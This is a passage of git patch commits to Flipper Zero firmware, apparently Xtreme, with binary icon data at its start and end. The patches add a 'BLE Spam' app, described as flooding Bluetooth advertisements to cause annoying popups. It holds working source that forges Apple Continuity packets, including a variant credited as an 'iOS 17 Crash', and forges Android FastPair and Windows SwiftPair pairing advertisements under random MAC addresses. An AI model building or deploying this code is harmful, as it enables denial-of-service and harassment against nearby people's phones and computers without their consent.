z6RoWWe&1PEaIxX!ne5*lkCoGZ$ymBx(9Nn|_jdN9kx%Yk$tWy}x~})V@U+!7^3>!X zj2HG!JpXY24fFKHEvC?}uby5`qW*L(IMUR-X7N#fOY5Pg^o7T7rci%~XLsM3ma}!r z4(#x@A2V+*{;R@p;MevCkAcZYL>* zWEcW0h;V&C;i5z!JX(c_VK`A(kfo3!1p@{ZljDQ6iUY@C-OwJNKje0Izz4!{7Jv^j z%7sYUNRfU&*>y))$*Tj9ctFqH5iY3@A+i{SgSE1N^6F4P8Qm2^y+9oZYD!g-KcpoE zz}OuSnibvbx2lu4w6W4FueE;CHib&s{SHE4Q0< z28CMHsmtlW)p%JkC`cl!i8RA_Euv^A1RH}0v&C*AcnhKli<#j~JS_^8mFfcJ3WOCd zARrYAz>N~%WKv!Z*#&`Mcq>DgX)90I1REkK8{?%cnO3Vsuyui$E=y3AoUdzCDwGIN zJcB5~Vl@+#*J~%tq8Sl3n~f)EjyEwTBp?%S(V*0GU~@b!2hJE{@o5^5k5jxs+3&y$ zr9f@8)3ikLqnQe)l15wYnY7hxvr)9oM%$TAquEFfL&2$-T8GqDM1h?Oh#VA-cN!nF17_>{lazZSH zFjt2}El$9SEeX|JpbA0vh?i@-UV2U`m@PKWY@um_qXmjEduc@Q4Cf`RP$DMI$}wI} z=#Cx^dX)$#qns+>5x9c#)VMN?*G@3KyLF@*smB9^5i~{6rhgJf#uFyhp3$Ch7Wpqu zvNVG(O$PSGbkMw@7m^*#FwU9Uc3$8oeikp#13>pW=@GxZboJ8JBL;e8+*@6}boGdV z9vSym*Z)SBzVmeo1>j#$1YVZLR>-fxi&hfh52>HDbqo-GR0-PZu=}%m*yYl~?54 JH)ZaUzX7jvs(t_f literal 0 HcmV?d00001 diff --git a/applications/external/ble_spam/icons/ble.png b/applications/external/ble_spam/icons/ble.png new file mode 100644 index 0000000000000000000000000000000000000000..f5cf3880bc8344c6cdad680afa6a3ab8ab2b47aa GIT binary patch literal 5165 zcmeHLe{dAl9p8f_glm&Q23rOlT+cGfkG*@l`}U_fVz>**(OifjLQ+88efut1xL@3D zau*y0f3?+C0ja*SRu%xporl-5=5OxIxn(F)-l$x z1oC}97}Ll_`qTU!1EAmib|lgki$vILE|aj66pY?=_l|J$>$hAxc*m;7g{>HpO~b5Dm`%N#+MOM< zFFrZvYln*2cefSJ&o7)~cHe63JRw!}ypY=S_)PwLYp=fR_N$gvOf%;`IY5uZ+WiMk zo|*4E@ZMnmcQ5{`zA5^@ z-90DQIbA~ow~CKHedD9EzcpC9T7T+^mPd*Yt9v%+r@qj&?Y5(9ckN&C$o{jxxnu6p zGmC$_?#J2#U-{B=6*B{Kj<+qZl!u@H+q0d`Z{73S;rhQ`Sdd%z{-XPL5Z`S*+t=5B zeBCE!-(J+xT8#a<;@GFd>UFQ*^84VipWS@){BtMq%B@3U_D8?`^h6c&0-u!_|RymqP*8V{tZy1D%jYkxY)VIEaIYYb@G*LSU(%t;<;ny*;|T z3;|c+K#${O^-!o#Clp>kn;^_0qkP%kT+-vQNQfqB3PAIqA3uTL zu@hs?nxLDz&0Ht6NV<};B5Xh7oFDWjW)vgvMb!wriL#(-lDH%|fCTL)Y8NRAp#CfAY4B*THxraQVF zhjOwE$A}sZ1!<#gxMQRZFGjqMN_M$$@r-3B`u`udTRdzX@I%O(?L5fu_m)Z(wTf;k zU6n4AwpU6l>lKA=kdg^`qmNpio`6-_B0WaBn?m;}r|ZbN{TZoXU=?e!s&PC|cn(Xd z#c3jB6Tuo0uwbZ&C==21nS@g?a`h(-7f$3Z^iVfE;4qFy94~Yr zNq6sIxa_dd;2;nSCL{K%dD#_x+xP1O7!qbPOT{#mGl4V}xdCnvVdX`KrPDPr@5lTfu zG|XemyyPazx};n=6IB_jMnXt%h6-hfiAgz4krYma-lr*siUqUO*+(n=b45`cXAE;JG9;`e0HnZqWB~e#(9Ea*ANtDIt^c@07cy z+%+i=Op19byQbVVDGyAFc`CaunY;XBuQq5J{*e^m#l@YOH_yULk1F%4O;PXl2lKDU zi(7!2nQiXMGfeFvcle%ITzd^H&TwM!#u*>@Ybuw7&R8cdz*2oI+R!ogt-H7LwG67B zcJIZD1Fh0e?19!6cEvltj=XvA`?v2ISi<~#eIhsb-iF5pUu)XAezE++)yb!KzN>#w ZUwfn~Fl);N;bvEOtg$t^Z`qyq{Re!!p!fg) literal 0 HcmV?d00001 diff --git a/applications/external/ble_spam/protocols/_base.h b/applications/external/ble_spam/protocols/_base.h new file mode 100644 index 000000000..d3fbe98ff --- /dev/null +++ b/applications/external/ble_spam/protocols/_base.h @@ -0,0 +1,17 @@ +#pragma once + +#include +#include +#include +#include +#include "ble_spam_icons.h" +#include +#include + +typedef union BleSpamMsg BleSpamMsg; + +typedef struct { + const Icon* icon; + const char* (*get_name)(const BleSpamMsg* _msg); + void (*make_packet)(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg); +} BleSpamProtocol; diff --git a/applications/external/ble_spam/protocols/_registry.c b/applications/external/ble_spam/protocols/_registry.c new file mode 100644 index 000000000..2481cf1a4 --- /dev/null +++ b/applications/external/ble_spam/protocols/_registry.c @@ -0,0 +1,7 @@ +#include "_registry.h" + +const BleSpamProtocol* ble_spam_protocols[] = { + &ble_spam_protocol_continuity, +}; + +const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h new file mode 100644 index 000000000..b2e05db88 --- /dev/null +++ b/applications/external/ble_spam/protocols/_registry.h @@ -0,0 +1,11 @@ +#pragma once + +#include "continuity.h" + +union BleSpamMsg { + ContinuityMsg continuity; +}; + +extern const BleSpamProtocol* ble_spam_protocols[]; + +extern const size_t ble_spam_protocols_count; diff --git a/applications/external/ble_spam/protocols/continuity.c b/applications/external/ble_spam/protocols/continuity.c new file mode 100644 index 000000000..ac0a2aa00 --- /dev/null +++ b/applications/external/ble_spam/protocols/continuity.c @@ -0,0 +1,276 @@ +#include "continuity.h" +#include "_registry.h" + +// Hacked together by @Willy-JL +// iOS 17 Crash by @ECTO-1A +// Nearby Action IDs and Documentation at https://github.com/furiousMAC/continuity/ +// Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ + +static const char* type_names[ContinuityTypeCount] = { + [ContinuityTypeAirDrop] = "AirDrop", + [ContinuityTypeProximityPair] = "Proximity Pair", + [ContinuityTypeAirplayTarget] = "Airplay Target", + [ContinuityTypeHandoff] = "Handoff", + [ContinuityTypeTetheringSource] = "Tethering Source", + [ContinuityTypeNearbyAction] = "Nearby Action", + [ContinuityTypeNearbyInfo] = "Nearby Info", + [ContinuityTypeCustomCrash] = "Custom Packet", +}; +const char* continuity_get_name(const BleSpamMsg* _msg) { + const ContinuityMsg* msg = &_msg->continuity; + return type_names[msg->type]; +} + +#define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size +static uint8_t packet_sizes[ContinuityTypeCount] = { + [ContinuityTypeAirDrop] = HEADER_LEN + 18, + [ContinuityTypeProximityPair] = HEADER_LEN + 25, + [ContinuityTypeAirplayTarget] = HEADER_LEN + 6, + [ContinuityTypeHandoff] = HEADER_LEN + 14, + [ContinuityTypeTetheringSource] = HEADER_LEN + 6, + [ContinuityTypeNearbyAction] = HEADER_LEN + 5, + [ContinuityTypeNearbyInfo] = HEADER_LEN + 5, + [ContinuityTypeCustomCrash] = HEADER_LEN + 11, +}; + +void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { + const ContinuityMsg* msg = _msg ? &_msg->continuity : NULL; + + ContinuityType type; + if(msg) { + type = msg->type; + } else { + const ContinuityType types[] = { + ContinuityTypeProximityPair, + ContinuityTypeNearbyAction, + ContinuityTypeCustomCrash, + }; + type = types[rand() % COUNT_OF(types)]; + } + + uint8_t size = packet_sizes[type]; + uint8_t* packet = malloc(size); + uint8_t i = 0; + + packet[i++] = size - 1; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x4C; // Company ID (Apple, Inc.) + packet[i++] = 0x00; // ... + packet[i++] = type; // Continuity Type + packet[i] = size - i - 1; // Continuity Size + i++; + + switch(type) { + case ContinuityTypeAirDrop: { + packet[i++] = 0x00; // Zeros + packet[i++] = 0x00; // ... + packet[i++] = 0x00; // ... + packet[i++] = 0x00; // ... + packet[i++] = 0x00; // ... + packet[i++] = 0x00; // ... + packet[i++] = 0x00; // ... + packet[i++] = 0x00; // ... + packet[i++] = 0x01; // Version + packet[i++] = (rand() % 256); // AppleID + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // Phone Number + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // Email + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // Email2 + packet[i++] = (rand() % 256); // ... + packet[i++] = 0x00; // Zero + break; + } + + case ContinuityTypeProximityPair: { + uint16_t model; + if(msg && msg->data.proximity_pair.model != 0x0000) { + model = msg->data.proximity_pair.model; + } else { + const uint16_t models[] = { + 0x0E20, // AirPods Pro + 0x0620, // Beats Solo 3 + 0x0A20, // AirPods Max + 0x1020, // Beats Flex + 0x0055, // Airtag + 0x0030, // Hermes Airtag + 0x0220, // AirPods + 0x0F20, // AirPods 2nd Gen + 0x1320, // AirPods 3rd Gen + 0x1420, // AirPods Pro 2nd Gen + 0x0320, // Powerbeats 3 + 0x0B20, // Powerbeats Pro + 0x0C20, // Beats Solo Pro + 0x1120, // Beats Studio Buds + 0x0520, // Beats X + 0x0920, // Beats Studio 3 + 0x1720, // Beats Studio Pro + 0x1220, // Beats Fit Pro + 0x1620, // Beats Studio Buds+ + }; + model = models[rand() % COUNT_OF(models)]; + } + + uint8_t prefix; + if(msg && msg->data.proximity_pair.prefix == 0x00) { + prefix = msg->data.proximity_pair.prefix; + } else { + if(model == 0x0055 || model == 0x0030) + prefix = 0x05; + else + prefix = 0x01; + } + + packet[i++] = prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05) + packet[i++] = (model >> 0x08) & 0xFF; + packet[i++] = (model >> 0x00) & 0xFF; + packet[i++] = 0x55; // Status + packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level + packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level + packet[i++] = (rand() % 256); // Lid Open Counter + packet[i++] = 0x00; // Device Color + packet[i++] = 0x00; + furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload + i += 16; + break; + } + + case ContinuityTypeAirplayTarget: { + packet[i++] = (rand() % 256); // Flags + packet[i++] = (rand() % 256); // Configuration Seed + packet[i++] = (rand() % 256); // IPv4 Address + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + break; + } + + case ContinuityTypeHandoff: { + packet[i++] = 0x01; // Version + packet[i++] = (rand() % 256); // Initialization Vector + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // AES-GCM Auth Tag + packet[i++] = (rand() % 256); // Encrypted Payload + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + break; + } + + case ContinuityTypeTetheringSource: { + packet[i++] = 0x01; // Version + packet[i++] = (rand() % 256); // Flags + packet[i++] = (rand() % 101); // Battery Life + packet[i++] = 0x00; // Cell Service Type + packet[i++] = (rand() % 8); // ... + packet[i++] = (rand() % 5); // Cell Service Strength + break; + } + + case ContinuityTypeNearbyAction: { + uint8_t action; + if(msg && msg->data.nearby_action.type != 0x00) { + action = msg->data.nearby_action.type; + } else { + const uint8_t actions[] = { + 0x13, // AppleTV AutoFill + 0x27, // AppleTV Connecting... + 0x20, // Join This AppleTV? + 0x19, // AppleTV Audio Sync + 0x1E, // AppleTV Color Balance + 0x09, // Setup New iPhone + 0x02, // Transfer Phone Number + 0x0B, // HomePod Setup + 0x01, // Setup New AppleTV + 0x06, // Pair AppleTV + 0x0D, // HomeKit AppleTV Setup + 0x2B, // AppleID for AppleTV? + }; + action = actions[rand() % COUNT_OF(actions)]; + } + + uint8_t flag; + if(msg && msg->data.nearby_action.flags != 0x00) { + flag = msg->data.nearby_action.flags; + } else { + flag = 0xC0; + if(action == 0x20 && rand() % 2) flag--; // More spam for 'Join This AppleTV?' + if(action == 0x09 && rand() % 2) flag = 0x40; // Glitched 'Setup New Device' + } + + packet[i++] = flag; // Action Flags + packet[i++] = action; // Action Type + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; + break; + } + + case ContinuityTypeNearbyInfo: { + packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code + packet[i++] = (rand() % 256); // Status Flags + packet[i++] = (rand() % 256); // Authentication Tag + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + break; + } + + case ContinuityTypeCustomCrash: { + // Found by @ECTO-1A + + const uint8_t actions[] = { + 0x13, // AppleTV AutoFill + 0x27, // AppleTV Connecting... + 0x20, // Join This AppleTV? + 0x19, // AppleTV Audio Sync + 0x1E, // AppleTV Color Balance + 0x09, // Setup New iPhone + 0x02, // Transfer Phone Number + 0x0B, // HomePod Setup + 0x01, // Setup New AppleTV + 0x06, // Pair AppleTV + 0x0D, // HomeKit AppleTV Setup + 0x2B, // AppleID for AppleTV? + }; + uint8_t action = actions[rand() % COUNT_OF(actions)]; + + uint8_t flag = 0xC0; + if(action == 0x20 && rand() % 2) flag--; // More spam for 'Join This AppleTV?' + if(action == 0x09 && rand() % 2) flag = 0x40; // Glitched 'Setup New Device' + + i -= 2; // Override segment header + packet[i++] = ContinuityTypeNearbyAction; // Continuity Type + packet[i++] = 0x05; // Continuity Size + packet[i++] = flag; // Action Flags + packet[i++] = action; // Action Type + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; + + packet[i++] = 0x00; // Terminator (?) + packet[i++] = 0x00; // ... + + packet[i++] = ContinuityTypeNearbyInfo; // Continuity Type (?) + furi_hal_random_fill_buf(&packet[i], 3); // Continuity Size (?) + Shenanigans (???) + i += 3; + break; + } + + default: + break; + } + + *out_size = size; + *out_packet = packet; +} + +const BleSpamProtocol ble_spam_protocol_continuity = { + .icon = &I_apple, + .get_name = continuity_get_name, + .make_packet = continuity_make_packet, +}; diff --git a/applications/external/ble_spam/protocols/continuity.h b/applications/external/ble_spam/protocols/continuity.h new file mode 100644 index 000000000..7e97f8425 --- /dev/null +++ b/applications/external/ble_spam/protocols/continuity.h @@ -0,0 +1,36 @@ +#pragma once +#include "_base.h" + +// Hacked together by @Willy-JL +// iOS 17 Crash by @ECTO-1A +// Nearby Action IDs and Documentation at https://github.com/furiousMAC/continuity/ +// Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ + +typedef enum { + ContinuityTypeAirDrop = 0x05, + ContinuityTypeProximityPair = 0x07, + ContinuityTypeAirplayTarget = 0x09, + ContinuityTypeHandoff = 0x0C, + ContinuityTypeTetheringSource = 0x0E, + ContinuityTypeNearbyAction = 0x0F, + ContinuityTypeNearbyInfo = 0x10, + + ContinuityTypeCustomCrash, + ContinuityTypeCount +} ContinuityType; + +typedef struct { + ContinuityType type; + union { + struct { + uint8_t prefix; + uint16_t model; + } proximity_pair; + struct { + uint8_t flags; + uint8_t type; + } nearby_action; + } data; +} ContinuityMsg; + +extern const BleSpamProtocol ble_spam_protocol_continuity; From 74c3ab88d9409a8318cd276f3f6010d3edfcc740 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 15 Oct 2023 18:53:31 +0100 Subject: [PATCH 16/20] BLE Spam add Android FastPair spam Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com> --- .../external/ble_spam/application.fam | 2 +- applications/external/ble_spam/ble_spam.c | 18 ++++- .../external/ble_spam/icons/android.png | Bin 0 -> 5160 bytes .../external/ble_spam/protocols/_registry.c | 1 + .../external/ble_spam/protocols/_registry.h | 2 + .../external/ble_spam/protocols/fastpair.c | 72 ++++++++++++++++++ .../external/ble_spam/protocols/fastpair.h | 11 +++ 7 files changed, 103 insertions(+), 3 deletions(-) create mode 100644 applications/external/ble_spam/icons/android.png create mode 100644 applications/external/ble_spam/protocols/fastpair.c create mode 100644 applications/external/ble_spam/protocols/fastpair.h diff --git a/applications/external/ble_spam/application.fam b/applications/external/ble_spam/application.fam index 1f0c019f1..d66dbeb14 100644 --- a/applications/external/ble_spam/application.fam +++ b/applications/external/ble_spam/application.fam @@ -6,7 +6,7 @@ App( stack_size=4 * 1024, fap_icon="ble_spam_10px.png", fap_category="Bluetooth", - fap_author="@Willy-JL & @ECTO-1A", + fap_author="@Willy-JL @ECTO-1A @Spooks4576", fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", fap_version="2.0", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index 9a440471d..82903121a 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -7,7 +7,8 @@ // Hacked together by @Willy-JL // Custom adv API by @Willy-JL (idea by @xMasterX) // iOS 17 Crash by @ECTO-1A -// Research on behaviors and parameters by @Willy-JL and @ECTO-1A +// Android Pairs by @Spooks4576 and @ECTO-1A +// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam typedef struct { @@ -84,6 +85,19 @@ static Attack attacks[] = { }, }, }, + { + .title = "Android Device Pair", + .text = "~15min cooldown, long range", + .payload = + { + .random_mac = true, + .protocol = &ble_spam_protocol_fastpair, + .msg = + { + .fastpair = {}, + }, + }, + }, }; #define ATTACK_COUNT ((signed)COUNT_OF(attacks)) @@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { AlignTop, "App+Spam: \e#WillyJL\e# XFW\n" "Apple+Crash: \e#ECTO-1A\e#\n" - "\n" + "Android: \e#Spooks4576\e#\n" " Version \e#2.0\e#", false); break; diff --git a/applications/external/ble_spam/icons/android.png b/applications/external/ble_spam/icons/android.png new file mode 100644 index 0000000000000000000000000000000000000000..efd5b28cbb8212ecec24933f6235c75c68c317b1 GIT binary patch literal 5160 zcmeHLeQXrR72gAc&82n&a#{q0TrQ!BA$vQ!JG-~L^Oxj zUu~qyD)5)@G&gT&-u&LY&zajNTUIw!`seu>hN+A-M_ZvUhvu)C3BQG7(Msq}(2kfD zi!Ej<+!==Pl`%e`Ts~ikcGpkyO=qS<|2VWcK)XC{o9CP1_1^({eu@4b(07-3+%>#! z8sm!E2~7aH8v36?v!5u+ItaA;sqnrBfSLhqq;HDFTLMCeMEN`1ufpbJ5bf7D^W$KD@Q7 zz4pPgT~6oFjmKf3FgIo}?vTCZ(?Zq?I;r<6VSYv*t3+l||W_bBiC@Mtt}741BHb zquV~d`0nCWs|&F+WhXuvR&IN1+3!Lpe)i?#mtQ`M*K8RQGcWz}lT$O%KVq8?>>Ye& z%faN(@T+@k9(eP775ck*bk7GX>t9&Di+TOU--pj{`E*0zmB0M+-9H?;FnwUxzSi)Y zhi*r$yFciCF@L%5!w)a*SpQJnqaE3OC!c%++%db%ZtHM5;;S^0PKI3*Hg6=V8LV6CuPtZ* zkfe?tC?pf9oK}bgJzNcFcbE$XJQinTB-jCA)R4~701n|0VjBx~pAcN?57cH&OKXj; zC_%teB-rCP8I9xe`FtoZhSJ$?j#pKcLjorVEO4;7{*?rwDbS06b&^PB@G#OA-l-OjTsDU;&t*$}FLZ zp{uGQ5|fOBSd+COD)q$pUAa)E3x!3DCCgwXf)o~qdCaPYYO*pyVmK@j15@llxqi^< zTVj!*5JF=kEeYMR(%EDrxXMoT7RDyp>?B?1=&sRtSq<~DgfQY&C5*@6t*6->1e}ZM zRY-5SNwgJ!s6*h`NxhqLnN+to;krcwWx%ky8>fKmje{;)Lze1JI@^{`CnCYoqB}Yr zhjcP^M~~_b1!<#YxNW2iFF`yM<1zlUXu&CQ360u37M3Ar_42Fu1Q&7Qp{7) zHD#_zSzuDkQ_*$J%;g_@wLw$xk0cK-E($e&It?#9W*T2Vi zhN(L2Hs5ngs^-IBxf6>wmjBgXIqe>%@ye%Pf*~yyt#6zA&fWoa4il)Dp1<|#)$<)M z{d{2MyrcDxAG-6*+MAXgI67Q8a8AI9(_Oc|mujEA{qtA2i)YFg#O7DeePY+!yIr}l N#?{e%%fIpPzX9_fastpair; + UNUSED(msg); + return "FastPair"; +} + +void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { + const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL; + + uint32_t model_id; + if(msg && msg->model_id != 0x000000) { + model_id = msg->model_id; + } else { + const uint32_t models[] = { + // Genuine devices + 0xCD8256, // Bose NC 700 + 0xF52494, // JBL Buds Pro + 0x718FA4, // JBL Live 300TWS + 0x821F66, // JBL Flip 6 + 0x92BBBD, // Pixel Buds + + // Custom debug popups + 0xAA1FE1, // ClownMaster + 0xAA187F, // VBucks + 0xF38C02, // Boykisser + 0x1448C9, // BLM + 0xD5AB33, // Xtreme + 0x13B39D, // Talking Sasquach + }; + model_id = models[rand() % COUNT_OF(models)]; + } + + uint8_t size = 17; + uint8_t* packet = malloc(size); + uint8_t i = 0; + + packet[i++] = 2; // Size + packet[i++] = 0x01; // AD Type (Flags) + packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED + + packet[i++] = 3; // Size + packet[i++] = 0x03; // AD Type (Service UUID List) + packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) + packet[i++] = 0xFE; // ... + + packet[i++] = 6; // Size + packet[i++] = 0x16; // AD Type (Service Data) + packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) + packet[i++] = 0xFE; // ... + packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID + packet[i++] = (model_id >> 0x08) & 0xFF; // ... + packet[i++] = (model_id >> 0x00) & 0xFF; // ... + + packet[i++] = 2; // Size + packet[i++] = 0x0A; // AD Type (Tx Power Level) + packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm + + *out_size = size; + *out_packet = packet; +} + +const BleSpamProtocol ble_spam_protocol_fastpair = { + .icon = &I_android, + .get_name = fastpair_get_name, + .make_packet = fastpair_make_packet, +}; diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h new file mode 100644 index 000000000..6555d0b6b --- /dev/null +++ b/applications/external/ble_spam/protocols/fastpair.h @@ -0,0 +1,11 @@ +#pragma once +#include "_base.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction + +typedef struct { + uint32_t model_id; +} FastpairMsg; + +extern const BleSpamProtocol ble_spam_protocol_fastpair; From 8e8ac1af967d1504959aed28bfbb535cb725b4af Mon Sep 17 00:00:00 2001 From: Clara K Date: Sun, 15 Oct 2023 19:54:58 +0200 Subject: [PATCH 17/20] Update FUNDING.yml --- .github/FUNDING.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index a9d62be90..b70b073d7 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1,7 +1,7 @@ # These are supported funding model platforms github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] -patreon: CynthiaLabs +patreon: crazyco open_collective: # Replace with a single Open Collective username ko_fi: # Replace with a single Ko-fi username tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel From 4afc3ff14c3167498296aadec54d2e4e85495920 Mon Sep 17 00:00:00 2001 From: Clara K Date: Sun, 15 Oct 2023 19:56:03 +0200 Subject: [PATCH 18/20] Update ReadMe.md --nobuild --- ReadMe.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ReadMe.md b/ReadMe.md index c8eef444a..152eb56ab 100644 --- a/ReadMe.md +++ b/ReadMe.md @@ -219,7 +219,7 @@ $ ./fbt launch APPSRC=some_appid ## ❤️ Support If you like what you're seeing, **please consider donating to us**. We won't ever put this behind a paywall, but we'd still appreciate a few bucks! -- **[Patreon](https://patreon.com/CynthiaLabs)**: ❤️ Account needed, subscription with perks across my entire org. +- **[Patreon](https://patreon.com/crazyco)**: ❤️ Account needed, subscription with perks across my entire org. - **[Wire-transfer](https://bunq.me/ClaraK)**: No account needed, one-time - **[Paypal](https://paypal.me/RdX2020)**: Account needed, one-time - **[ko-fi](https://ko-fi.com/cynthialabs)**: No account needed, one-time From 68baeff45aeef4c7795c5cde832caf9547f7142a Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 15 Oct 2023 19:24:26 +0100 Subject: [PATCH 19/20] BLE Spam add Windows SwiftPair spam Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com> --- applications/external/ble_spam/ble_spam.c | 17 +++++- .../external/ble_spam/icons/windows.png | Bin 0 -> 4478 bytes .../external/ble_spam/protocols/_registry.c | 1 + .../external/ble_spam/protocols/_registry.h | 2 + .../external/ble_spam/protocols/swiftpair.c | 54 ++++++++++++++++++ .../external/ble_spam/protocols/swiftpair.h | 11 ++++ 6 files changed, 83 insertions(+), 2 deletions(-) create mode 100644 applications/external/ble_spam/icons/windows.png create mode 100644 applications/external/ble_spam/protocols/swiftpair.c create mode 100644 applications/external/ble_spam/protocols/swiftpair.h diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index 82903121a..605fc1372 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -7,7 +7,7 @@ // Hacked together by @Willy-JL // Custom adv API by @Willy-JL (idea by @xMasterX) // iOS 17 Crash by @ECTO-1A -// Android Pairs by @Spooks4576 and @ECTO-1A +// Android and Windows Pairs by @Spooks4576 and @ECTO-1A // Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam @@ -98,6 +98,19 @@ static Attack attacks[] = { }, }, }, + { + .title = "Windows Device Found", + .text = "Requires enabling SwiftPair", + .payload = + { + .random_mac = true, + .protocol = &ble_spam_protocol_swiftpair, + .msg = + { + .swiftpair = {}, + }, + }, + }, }; #define ATTACK_COUNT ((signed)COUNT_OF(attacks)) @@ -256,7 +269,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { AlignTop, "App+Spam: \e#WillyJL\e# XFW\n" "Apple+Crash: \e#ECTO-1A\e#\n" - "Android: \e#Spooks4576\e#\n" + "Android+Win: \e#Spooks4576\e#\n" " Version \e#2.0\e#", false); break; diff --git a/applications/external/ble_spam/icons/windows.png b/applications/external/ble_spam/icons/windows.png new file mode 100644 index 0000000000000000000000000000000000000000..9b734d16156dd72fc9d57a2d5df50b57b2eb2aab GIT binary patch literal 4478 zcmeHLeQXnD7{6}pgX$JtrVuo67731dy}RDEy*pRNSjSdaVT=NsL-Bg|b~{)<*51}` zL?z%CD2@*ir>Kx1L?R?ah+lvpEMP>y@R9ftokK*_fQeDmi1@tMuG`eaEXsdt`}TeA zeV_ODJkRfa-sgHU) z{dQ>D<4IflLB_9K)C+N>;N<#<@n*f@!0B$gu?PU2a~#)Ey+rhbnw z(wN@UqrkuAT6uYmr@WkuM8g5C89~q+A6(?uBzIim3dyn_7<6ymde zo$)JUP!Jat5dfAoefbj(w0-hb}9v8Mf>ceg)# z?XA*E_lFHP=00)w^L*N|IM#k~+2PIw^GhB&w?MD&>6*>0 zduig+1y6S8&y${8U%e`^QrNmkI)6ib=iK8B8~03Kwdd0N3r8RSuK0rm+r&riymi-z zk(R>KHPf;jy}Q5NQdf2Aq4$oIe)HReXwg@bmakDvbDLJ*SNhAi-!Gk=R6R4{`Eta` ztG&XwLsL#zPri1~@hiK|@w1lpaFJKuxOyg=`O(v{Z%6mjOZNwRdf(nrwB*3~eC7xB z=+^J2mpwmqGqLyOkDTY1{?S10{`#l0pB%ZExq9=?TIYd-cQCbEzHfawex>c_pD%aK zd${zGy6Dc+E8f)!BELcN)#-KKYDozPt+E>SBWofU!TUv&lqMpwvKZ;4A2n(rm*w(1 z?^;Mrby?=yy^J?fj+(TpjwqVbG1I4XELKF-QaagOl8^u(h;*4u1e-%KDdDmhxDv>C zn6{9HioV!ose?2s4@VKnTX`!(RV1`Fn`N?@EQzWCsn$I$1p!wsOOvigB$|%LJmLXDamtim5qZkN`E52%78F_J20+Y;YLJz3 z^FXgKlnPKzp5u9Yz)#r~Mxb~n%TuCXR4E6;a89RP@q-Bi3h#qdR^xG5Y*wa!q^4Qc z1L0`UWvSLet%?2#pB6-ObQzPzIz%Vy;01wq2zL1NE6qdE7$h9VG%BPqqbkxgK$IbI zw4mIG=t!v1n84d2K`=n9jPn$bjd6%YDvu&r4@Z6BaI?#jF1qPyFB~UT)@8S>Be0e( z!@j;UT+FZ%lZ*?)dBds}X#Y2De0azb(1$Ir(qdr0-55%qs5z)5d6m3u){LV>lE$Hs zWF;9wOm0J};U{1vr<5i+)QF&Zq|&u-T>FPqka>X@9fC-)tin>fT~H~JgKScGQL*th 